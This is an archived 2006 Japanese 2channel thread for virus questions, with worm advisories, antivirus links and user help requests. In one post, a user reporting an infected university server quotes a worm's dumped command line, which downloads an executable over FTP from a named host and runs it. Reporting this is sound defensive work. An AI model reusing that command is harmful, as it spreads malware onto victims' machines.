5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ウィルス情報質問 総合スレッド★Part36

1 :名無しさん@お腹いっぱい。:2006/05/03(水) 12:12:00
ウィルスに関わる話題・質問はこちら。
Winny、P2P関連のウィルスは、Download板に専門スレッドがあります。

【  最  重  要  事  項  】
ウィスルやブラクラだと思われる物の直リンは厳禁!!!!!!!!!!
質問の時は頭の『ht』を抜いて貼り付ける事

【質問する前、書き込む前に必読する】 テンプレサイト
コンピュータウィルス総合スレッド テンプレミラーサイト(PC初心者板)
http://pcqa.tripod.co.jp/virus.htm
【警報】Winnyを狙ったワーム・ウイルス情報 テンプレまとめサイト(Download板)
http://www.geocities.jp/kemkzuenc/Antinny.html

尚、質問・回答が効率的に行えるよう、質問時には次のテンプレを使用してください。

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

前スレ
ウィルス情報質問 総合スレッド★Part35
http://pc8.2ch.net/test/read.cgi/sec/1141130947/

2 :名無しさん@お腹いっぱい。:2006/05/03(水) 12:13:05
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■  ※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社 http://www.trendmicro.com/jp/home/personal.htm
 製品名:ウイルスバスター2006インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
 製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)
http://www.vintage-solutions.com/Japanese/
 製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
 製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
 製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
 製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
 http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
 該当する場合は諦めてノートンかウィルスバスターを買いましょう。

3 :名無しさん@お腹いっぱい。:2006/05/03(水) 12:13:36
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
 →常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
 →知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
 →ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
 →アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
 →怪しいファイルにウィルスが混入しているケースもよくあることです。
  怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
 もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
 http://www.ipa.go.jp/security/outline/todokede-j.html
 こちらに届け出の方法などが記載されています。
 E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。

4 :名無しさん@お腹いっぱい。:2006/05/03(水) 12:14:07
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D

5 :名無しさん@お腹いっぱい。:2006/05/03(水) 12:14:38
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html

6 :名無しさん@お腹いっぱい。:2006/05/03(水) 12:15:09
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
  * Mail Delivery System (<受取人メールアドレス>)
  * Failure (<受取人メールアドレス>)
  * Delivered Message (<受取人メールアドレス>)
  * Deliver Mail (<受取人メールアドレス>)
  * Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
   例: date7386.pif 、 message19392.zip など

「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
  * Error
  * Status
  * Server Report
  * Mail Transaction Failed
  * Mail Delivery System
  * hello
  * hi
  [ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
  "test"
  "The message contains Unicode characters and has been sent as a binary attachment."
  "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
  "Mail transaction failed. Partial message is available."
  [ 任意の文字列 ]  [ 空白 ]
・添付ファイル名: ランダムなアルファベット

7 :名無しさん@お腹いっぱい。:2006/05/03(水) 12:15:41
「既出です」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
   ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
  デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
  ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ウイルス情報 Part54
http://tmp6.2ch.net/test/read.cgi/download/1146159356/

Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part7
http://pc8.2ch.net/test/read.cgi/sec/1137773269/

Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイトを見たら…助けてください!Part61
http://pc7.2ch.net/test/read.cgi/pcqa/1141370819/

8 :名無しさん@お腹いっぱい。:2006/05/03(水) 12:16:51
関連スレッド

Winnyを狙ったワーム・ウイルス情報 Part54
http://tmp6.2ch.net/test/read.cgi/download/1146159356/
sasser【スタコラサッサ】sasser Part2
http://pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc8.2ch.net/test/read.cgi/sec/1065964513/
【差出人】WORM_NETSKY【詐称】
http://pc5.2ch.net/test/read.cgi/sec/1080741342/
「Nimda !! 」【その4】
http://pc5.2ch.net/test/read.cgi/sec/1001864573/
エロサイトを見たら…助けてください!Part61
http://pc7.2ch.net/test/read.cgi/pcqa/1141370819/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc8.2ch.net/test/read.cgi/sec/1091174837/
アンチウィルスソフトのウィルス誤検出
http://pc8.2ch.net/test/read.cgi/sec/1027753135/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc8.2ch.net/test/read.cgi/sec/1086494732/

関連スレは次スレに移行してる場合もあります。


質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/

テンプレここまで。
古いところもありますが、適宜ヨロシクということで、マターリいきまっしょ。

9 :名無しさん@お腹いっぱい。:2006/05/03(水) 12:56:39
信頼性の高いav-comparatives.orgという専門組織が行った、
アンチウイルスの最新の総合性能テスト結果。

http://www.av-comparatives.org/seiten/ergebnisse_2006_02.php
※polymorphicウィルス検出結果
1位 ノートン           100%
2位 AntiVirusKit(G DATA)  99,9%
3位 Kaspersky5、F-Secure6 99,4%

※ウイルス検出結果(DOSウイルスは含まない)
1位 AntiVirusKit(G DATA)  99,84%
2位 F-Secure6         99,58%
3位 Kaspersky5         99,57%

※DOSウイルス検出結果
1位 AntiVirusKit(G DATA)  99,89%
2位 Kaspersky5、F-Secure6 99,77%

4位 NOD32 v2.5         98,77%

polymorphicウィルスとは
http://www.lifeboat.jp/support/db/006051117018.html


10 :名無しさん@お腹いっぱい。:2006/05/03(水) 13:01:55
スレ立て乙

11 :名無しさん@お腹いっぱい。:2006/05/03(水) 14:16:31


NOD32厨の工作にご注意を。
他製品のサポートサイトから過去のトラブルを探して、自分のPC上で起こっていないトラブル相談を、
ユーザーを装って大量に自演でネットに投稿したり、自分で糾弾スレを立てたりしています。

当板に住みついているNOD32厨(淫厨とペストパトロール厨を兼ねる)の紹介スレ
http://66.102.7.104/search?q=cache:yFC7aJM6xCgJ:l-lab.org/pukiwiki/pukiwiki.php
http://tmp6.2ch.net/test/read.cgi/tubo/1145644897/
http://z-temp.hp.infoseek.co.jp/2ch/Prescott699-.html
http://science3.2ch.net/test/read.cgi/infosys/1088029040/
過去に確認されているリモホ
osaknt01.ap.so-net.ne.jp
osaka-ip.dti.ne.jp
acca.osaka.ocn.ne.jp
P219108012044.ppp.prin.ne.jp(PHS)



12 :名無しさん@お腹いっぱい。:2006/05/03(水) 14:20:45
ψ【ウイルス最新情報スレッド】
http://pc8.2ch.net/test/read.cgi/pcnews/1098350729/

セキュリティ初心者質問スレッドpart69
http://pc8.2ch.net/test/read.cgi/sec/1145518029/

13 :名無しさん@お腹いっぱい。:2006/05/03(水) 17:56:46
>>1
おつ!

14 :名無しさん@お腹いっぱい。:2006/05/04(木) 00:06:34
>>1
 \ 乙 /     \ カレー /
    __
   /   /.|
  /   /. |
 /__/./| |__
 |__|/ .| |__| |  _____
   (゚Д゚,,)| | //  .| ボンカレー|:|
   (/  ヽ) |//   | (゚д゚,,) .|:|
   | ∞ |  /    (/ 辛 ヽ).|:|
   \_\/     |__  _|:|
    U"U ̄       U"U
結構時間かかったなぁ、今やっと見に来たんだけど

15 :SadMac575:2006/05/04(木) 19:24:09
すでに出ていると思いますが
直しかたがわかりません

-症状-
1.変なコンソールが出た

2.すべてのプログラムの中身やショートカット消えていった

3.再起動後、
NTLDR is missing
の文字が出てWindowsXPが起動しない


-環境-
CPUがAthlon64 3700のeMachineJ6452です
FDDは無し
HDDは250GBが一つ

-試したこと-
1.最低限の装備の環境で起動してみた
2.CMOSクリア

ウィルスだというのはわかりましたが
解決策をご存知の方、御教授願えますか?


16 :名無しさん@お腹いっぱい。:2006/05/04(木) 19:32:26
リカバリ汁

17 :名無しさん@お腹いっぱい。:2006/05/04(木) 19:59:14
返信有難うございます

リカバリというのは
システム修復ディスクを入れて
その後、どうすればよいのですか?


18 :名無しさん@お腹いっぱい。:2006/05/04(木) 20:17:11
>>17
擦るんだよ

19 :SadMac575:2006/05/04(木) 20:26:12
しかし、システム復元CDを入れて起動すると

Press R to display eMachines System recovery options.

が出て、カウントダウンを始めます。
カウントダウンが終わると、

Press F11 to Start recovery

のカウントダウンが始まり、F11を押しても、少しの間の後

Invalid System Disk or
Disk I/O error
Press a key to restart

と出て、また最初の表示(Press R to display eMachines......)
に戻ってしまいます。

Diskが違うのでしょうか?

20 :SadMac575:2006/05/04(木) 20:29:56
表示の文章を読む限り、

eMachineの修復オプションを表示するにはRを押してください。

ですし、このCDだけがこの表示をするので、システム修復CDはこれだと思うのですが......




21 :名無しさん@お腹いっぱい。:2006/05/04(木) 20:37:25
1.CDに傷があって読み込めない
2.ドライブがいかれてて読み込めない

22 :SadMac575:2006/05/04(木) 20:46:54
返信ありがとうございます。

1.CDに傷があって読み込めない
CDは袋から出したばかりなので、傷はありませんでした。

2.ドライブがいかれてて読み込めない
このPCを購入して二ヶ月ですが、どうでしょう。
ただいまからCD/DVDドライブを外して見てみます。

Disk I/O error
の時は上記の二点しか要素がありませんか?

23 :SadMac575:2006/05/04(木) 20:54:39
CD/DVDドライブ、外しました。

標準装備だったスーパーマルチCD/DVDドライブですが、挿入するコードは

4Pin と Master/Slaveの幅広コード の二つですか?

24 :名無しさん@お腹いっぱい。:2006/05/04(木) 21:46:33
って・・・あんた
これかい?
つttp://downloads.emachines.com/ug/desktop/jp/8510926_hdd_readme.pdf


25 :SadMac575:2006/05/04(木) 21:58:36
はい、そのリンク先のことがしたいですが、F11を押しても、

Invalid System Disk or
Disk I/O error
Press a key to restart

になってしまって、CDを読み込まない(?)ようなんです。
BIOS上ではCD/DVDドライブは認識されていて、一見壊れてはいないようです。



26 :名無しさん@お腹いっぱい。:2006/05/04(木) 22:10:05
>>25
BIOSで何からブートするようになってる?
HDDならF11で読むだろうけど


27 :SadMac575:2006/05/04(木) 22:18:15
Bootの優先順位は最優先から

CD/DVD > HDD > USB media reader > nVidia Boot agent

になっています

28 :SadMac575:2006/05/04(木) 22:20:40
CD/DVD > HDD

の部分は

HDD > CD/DVD

に入れ替えてみたりもしましたが...

結果は同じでした、>>19に回帰してしまいます

29 :名無しさん@お腹いっぱい。:2006/05/04(木) 22:22:49
バラしちゃったの?  うわぁーー
んじゃしょうがないから買ったところに電話して
「CD読めんぞゴルァ すぐ送れや」と電話汁

イーマだったら送ってくれるはず

30 :名無しさん@お腹いっぱい。:2006/05/04(木) 22:24:23
>>27
機種晒してないよね、HDDにリカバリ領域持ってるのか
CDやDVDでのリカバリ方式なのかでかわらない?
前記ならCD入れずに起動時にF11
後記ならCDいれて起動すればAutoRunのはず

31 :SadMac575:2006/05/04(木) 22:29:32
バラすというのは...どの範囲まででしょうか
当方、電源を交換、CPUファンを交換などはしましたが...
また、バラす(?)ことによって販売店、またはeMachines(GateWay)の
サポートを受けられなくなる等、の害があったのでしょうか ;;


32 :SadMac575:2006/05/04(木) 22:33:26
>>30
以前、このPCがWindowsを起動していたときは、HDDは一つしか入れてませんでしたが、
:C ドライブと :D ドライブがありました。

:D ドライブは復元パーティションだったようです。


HDDのコードの形状はIDEだと思います。
250GBの容量でした。


33 :名無しさん@お腹いっぱい。:2006/05/04(木) 22:36:33

電話によるテクニカルサポート
 (朝6時から深夜12時まで年中無休。祝日も含む)

34 :名無しさん@お腹いっぱい。:2006/05/04(木) 22:41:01

しっかし >当方、電源を交換、CPUファンを交換などはしましたが...
これやる奴が>15みたいな質問するのが信じられん

まして >:D ドライブは復元パーティションだったようです。

  本当に信じられん

35 :SadMac575:2006/05/04(木) 22:59:06
>>34
当方、最初に買ったPCはMachintoshでして...
575から始まって、G3、Ibook、G5など購入しました。
使用していたOSも漢字Talkから、OS8.9.X Panther Tigerと使ってきました。
もちろん、改造もいろいろしましたが...

そして、最近になって交友関係からWindows薦められ、eMachine購入に至った訳です。
内部の改造も早い段階から模型感覚で進めてしまって...
CPUファンを二段にしたりして喜んでた矢先にトラブルが発生してしまいました;;

Windowsの方では、知識足らずで本当に申し訳ありません...

36 :名無しさん@お腹いっぱい。:2006/05/04(木) 23:27:46

【セキュリティの基本】

ツールに頼るよりも用心の方が大事。

たとえばWinnyの類をやるなら、個人情報の類がまったく入っていない、
Winny専用のセカンドPCも用意しなくちゃ駄目(´・ω・) ス
厄介な新種、亜種に感染したらOSごとクリーンインスコが一番確実。

トラブルが多くて、効果が不確実なアンチウイルス製品などに頼り切るよりも、
怪しげなファイルは実行しないという【基本】を重視しよう。
アンチウイルスを頼ってばかりでは駄目(´・ω・) ス

例)
>NOD32 主なトラブル履歴
>
>2005年9月ブルースクリーンが生じてWindowsが停止する問題が再発。リリース中止。
>http://canon-sol.jp/product/nd/nd_update.html
>レジストリが破壊されてWindowsシャットダウン時にブルースクリーンとなる問題
>登録済みのアプリケーションが強制削除される問題
>http://canon-sol.jp/product/nd/v20008.html
>通信不能となって最悪の場合はOSがリブートの繰り返しになる問題
>http://canon-sol.jp/supp/nd/wndt4210.html
>スキャンすると受信メールの全部が削除される問題
>http://canon-sol.jp/supp/nd/wndt7003.html
>プリンタとの相性で印刷不能になる問題。
>http://canon-sol.jp/supp/nd/wndt4205.html
>Windowsアップデートができなくなる問題
>http://canon-sol.jp/supp/nd/wndt4212.html




37 :名無しさん@お腹いっぱい。:2006/05/04(木) 23:37:35
>>35
多分基本的に違うんだろうね
抽象的過ぎて解からないけど
HDD内の復元パーティションは
おそらくゴーストだろうね
一般的だから
表面的には見えないだろうから
やっぱり電話して(交換したことは内緒で)
素直にサポートを仰ぐのが手っ取り早い
リカバリディスクや領域はハードウェアの置換が
原因で(確かポイント制)効かなくなるから
それが原因かも(これは不明)

万が一、元の機器に戻せるなら
そうしてから使用すると、おkかも?

38 :SadMac575:2006/05/04(木) 23:49:34
返信、ありがとうございます。
最初の構成での起動も試しましたが、やはり駄目でした。

いずれ必要になるかと思い、新しいHDDを先ほど購入しました。
自宅に届くのを待っています。
HDDを交換して、駄目だったらサポートに電話してみたいと思います。

付き合っていただいたみなさん
どうもありがとうございました

p.s Mcafeeの期限が切れていたみたいです
どうみてもバカフィーです
どうもありがとうございました

39 :名無しさん@お腹いっぱい。:2006/05/04(木) 23:51:22
大変だなおまいも

40 :SadMac575:2006/05/04(木) 23:53:37
はい、18の春、GWは潰れそうです。

41 :名無しさん@お腹いっぱい。:2006/05/04(木) 23:58:57
>>40
駄目元でエアスプレーやクリーナーディスクでドライブを掃除したらどうだろう。

42 :SadMac575:2006/05/05(金) 00:03:03
そうですね、クリーナーディスクを試してみます。

Mac用のCDドライブが互換性を持ち合わせていればよかったのですが...
一応、所持しているものは全部試してみようと思います。



43 :名無しさん@お腹いっぱい。:2006/05/05(金) 00:06:15
>>42


44 :SadMac575:2006/05/05(金) 00:07:14
実際、こういう対処の仕方になってくると
セキュリティ板は板違いだったのかもしれませんね。



45 :Kazuo:2006/05/05(金) 00:19:47
誰か KAIST(韓国科学技術院)に知り合いがいたら次のことを伝えてください。
(あまり期待はしていませんが)

segfault.kaist.ac.kr (143.248.138.97) がワームに感染していて ftp で
ワームを送り出しています。
5月1日から二度にわたって、webadmin@kaist.ac.kr と staff@kaist.ac.kr に
メールを送ったのですが反応なし。yahoo.co.jp のアカウントで送ったので
スパムに分類されたのかもしれません。
とにかく今現在も ftp でワームを供給しています。

ワームを供給している ftp サーバー
server name: ftp.autosolve.com (143.248.138.97)
port: 21
user name : fuck
password : **** (伏せておきます)

この ftp サーバー上のファイルはただひとつ widn.exe で、
これは W32.Spybot.AFEW/W32.Spybot.ACDM 系統のワームです。

以下はワームのプロセスをダンプして出てきた文字列。

"cmd /k echo open ftp.autosolve.com>>iii&echo fuck>>iii
&echo ****>>iii&echo get widn.exe>>iii&echo bye>>iii
&ftp -s:iii&del /q /f iii&widn.exe\r\n"

ところで ftp.autosolve.com とファイルにハードコーディングされているのが
不思議です。最初はダイナミック DNS かと思ったのですが、www.autosolve.com を
のぞいてみると、何か中古自動車のディーラーのような、検査会社のような?
ここもハッカーに乗っ取られているのでしょうかね。

46 :名無しさん@お腹いっぱい。:2006/05/05(金) 21:55:44

WinXP
NotonAntiVirus2006.Auto-Protect有効
Windowsファイヤウォール有効

Spyware.Winspy
オンラインゲームのファイルの一つであるij11.dll(IntelR JPEG Library)で検出されました。
ゲームプレイ中に警告があり、スキャンすると未解決リスクとなって結果が出ます。
推薦処理はファイルの削除なのですが、削除してしまうとゲームが起動できなくなります。
1度削除し、ゲームクライアントの再ダウンロードを行ったところ、インストール中に同じファイルで警告が出ます。
Spybot、Ad-awareSEでもスキャンを行いましたが検出されません。
有害なファイルなのでしょうか?

Winspyの削除方法、進入させないための効果的な作業を教えていただきたいです。
よろしくお願いします。

47 :名無しさん@お腹いっぱい。:2006/05/05(金) 22:02:46
連投すみません。
セーフモードでもスキャン済です

48 :名無しさん@お腹いっぱい。:2006/05/05(金) 23:22:02
>>47
これじゃダメなん?・・・つttp://www.symantec.com/region/jp/avcenter/venc/data/spyware.atwinspy.html

49 :名無しさん@お腹いっぱい。:2006/05/05(金) 23:45:41
ありがとうございます。どうやら
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-spyware.winspy.html
こちらのようです。こちらの情報不足でした、すみません・・

ゲームクライアントの再インストール中、ネットワーク接続を切った状態で試してみましたが
やはり同じファイルで検出されます。
クライアントに含まれているものなのでしょうか・・

50 :名無しさん@お腹いっぱい。:2006/05/05(金) 23:51:40
>>49
失礼しました
「リスクが検出されないように設定」の表記から
そのようでうね、信頼するかどうかの問題のようです

51 :名無しさん@お腹いっぱい。:2006/05/05(金) 23:59:47
誤検知のたぐいですかね。安心致しました・・
どうもありがとうございました。


52 :名無しさん@お腹いっぱい。:2006/05/06(土) 09:59:33
教えてください。

WinXP Pro SP2、WindowsUpdate済み
ウィルスバスター2005(オートアップデート)
スキャンでの反応なし

という状態なのですが、昨日PCをオンし、Spleipnirを立ち上げたところで、画面全体が白く、
その上にドイツ語でなんか書かれた画面になりました。
ドイツ語は分からないのですが、画面びっしりの文字ではなくて、映画のエンドロールのような
感じでした。
そのときはビビッタので、そのままLANコード引っこ抜いて、シャットダウンしました。

その後は、PCを立ち上げても上記の画面が出てきません。あいかわらず、WBの反応はナシ。

これって、ウィルスなんでしょうか。


53 :名無しさん@お腹いっぱい。:2006/05/06(土) 10:05:36
アドウェア・スパイウェア駆除ソフトも合わせて使ってみるべきだと思います
多分アドウェアの類じゃないかと。
あとはウィルスバスター以外のオンラインスキャンかな?
おそらく前者で検出されると思います。

54 :52:2006/05/06(土) 10:32:38
>>53
ありがとうございます。あとで試してみます。
何ヶ月か前、ドイツ語ウィルスのニュースをネットで見た気がしたので、それかと思ってました。

仕事でも使ってるPCなので、この機会にシステムを再インストールしようと思ってます。
C,D,Eとパーテション分けてて、D,Eはデータ置き場(主に文書や画像)に使っているので、
現在、そのデータを吸い上げ中です(バックアップ取ってなかった)。

で、再び質問で恐縮なのですが、これから
HDDフォーマット→CにXP再インストール→D,Eのデータを再びコピー
という手順で作業する際、D.Eドライブのデータはウィルススキャン、スパイウェアスキャンの
ほか、なんかやっといた方がいいことってありますか?

55 :名無しさん@お腹いっぱい。:2006/05/06(土) 14:49:52
>>54
当然でしょうね。

56 :名無しさん@お腹いっぱい。:2006/05/06(土) 15:25:14
Diabloか

57 : ◆N9P3SuvBPo :2006/05/07(日) 15:30:23
この前おもしろい質問のDX版を作ってるんだけど、完成したら貼ってもいい?
期待なんてしないでくれ。

58 : ◆N9P3SuvBPo :2006/05/07(日) 17:23:08
ネタ質フォー!
【使用OS】 WindowsXP SP2 (ブラウザ:IE6 SP2)
【WindowsUpdateしてるか】 Sir,Yes Sir!
【AntiVirusは何を使っているか】 WinAntiVirus PRO 2006/WinFixer 2006/ErrorSafe
【ちゃんとUpdateしてるか】 Sir,Yes Sir!
【スキャンした結果(ウイルス名・発見場所)】 いくつか見つかるけど誤検出w
【別のオンラインスキャンしたならその結果は】 Trojan-ZlobとかAd-Wareとかのマルウェアが
「WinAntiVirus PRO 2006/WinFixer 2006/ErrorSafe」等から多数検出、
【症状を具体的に、分かる限りすべて書く】 BSOD連発。PCの処理に時間がかかる。CPUが100%から解放されない。
起動時間も10分を超えた。広告のポップアップも数倍に増幅。等々
【何をしたらそんなことになったのか】 PCの起動時間を現在の3分40秒から1分以内に短縮したくて、
F-Secureインターネットセキュリティ2006を削除→上記の『セキュリティ"対策"ソフト』を購入→インストール
【これまでにとった措置】 カード会社に連絡→クレジットカード番号の変更、
禁断のテンプレを通常モードとセーフモード(Administrator権限)で実行したが失敗に終わった。
【その他の質問】 こんな典型的なインチキソフトをインストールしてしまうなんて、
ボクは…騙されてしまったのでしょうか?

59 :名無しさん@お腹いっぱい。:2006/05/07(日) 23:23:35
>>58
GJ!

60 :名無しさん@お腹いっぱい。:2006/05/07(日) 23:29:01
え?('A`)

61 :名無しさん@お腹いっぱい。:2006/05/08(月) 00:17:02
【使用OS】 Windows XP SP1
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 ウイルスバスター2004
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 TROJ_AGENT.AWD
場所は _restore{1A7AFC79-C742-4D2F-95C8-6EF0A4EF7459}
【別のオンラインスキャンしたならその結果は】 上記と同じでした
【症状を具体的に、分かる限りすべて書く】 目立った症状はありません
【何をしたらそんなことになったのか】 分かりません
【これまでにとった措置】 セーフモードでのウイルススキャン
【その他の質問】 レジストリ改変しているところまで分かりました。
           どの値を削除、あるいは変更すればよいのか、ご教授お願いします。

62 : ◆N9P3SuvBPo :2006/05/08(月) 00:41:27
>61
>場所は _restore{1A7AFC79-C742-4D2F-95C8-6EF0A4EF7459}
システムの復元フォルダでは?
一度システムの復元を無効→復元有効でいいかも。

俺が書いた>58(ネタ質)がマジだったら
>【症状を具体的に、分かる限りすべて書く】 BSOD連発。
の時点でリカバリー決定だなw

63 :名無しさん@お腹いっぱい。:2006/05/08(月) 01:25:01
>>62
ありがとうございます。
無効→スキャンで検出されませんでした。

トレンドマイクロのHP見たら_restoreに関する記述があった……。
ちゃんと見なくちゃな……。

64 :名無しさん@お腹いっぱい。:2006/05/08(月) 11:17:17
あげ

65 :名無しさん@お腹いっぱい。:2006/05/08(月) 15:07:32
2ちゃんに書き込むと板?によっては
自分のIPが名前欄にsoftbank〜〜〜〜〜〜と
表示されるのですけどウイルスなんでしょうか?


66 :名無しさん@お腹いっぱい。:2006/05/08(月) 15:11:06
狼か

67 :名無しさん@お腹いっぱい。:2006/05/08(月) 15:16:39
>>65
板違い。ネットワークセキュリティに関係ない。
http://etc3.2ch.net/qa/へ。

ウィルスかどうかは、ウィルススキャンして確認しろ。テンプレ>>1-8参照。

68 :名無しさん@お腹いっぱい。:2006/05/08(月) 19:14:24
【使用OS】 windows xp
【WindowsUpdateしてるか】 多分。。。
【AntiVirusは何を使っているか】 ノートンインターネットセキュリティ
【ちゃんとUpdateしてるか】 手動では最近はやってませんでした。
【スキャンした結果(ウイルス名・発見場所)】
spy sweeperというスパイウェアをやってみたら 「system spy」が検出されて
しまいました。
これはスクリーンショット、オンラインショッピングのカード番号などが知られて
しまうウィルスのようですが、もう駆除はしましたが、これまで監視されていたという
ことは、なにか悪用されてしまう恐れがあるということでしょうか?
どうしたらいいのでしょうか?本当に初心者です。アドバイスお願いします。


69 :名無しさん@お腹いっぱい。:2006/05/08(月) 23:15:01
>>68
http://pc8.2ch.net/test/read.cgi/sec/1140158333/
Spy Sweeper Part2

70 :名無しさん@お腹いっぱい。:2006/05/09(火) 13:11:20
【使用OS】WindowsXp Home
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 ウイルスバスター2006
【ちゃんとUpdateしてるか】 しています
【スキャンした結果(ウイルス名・発見場所)】バスターに引っかからず
【別のオンラインスキャンしたならその結果は】
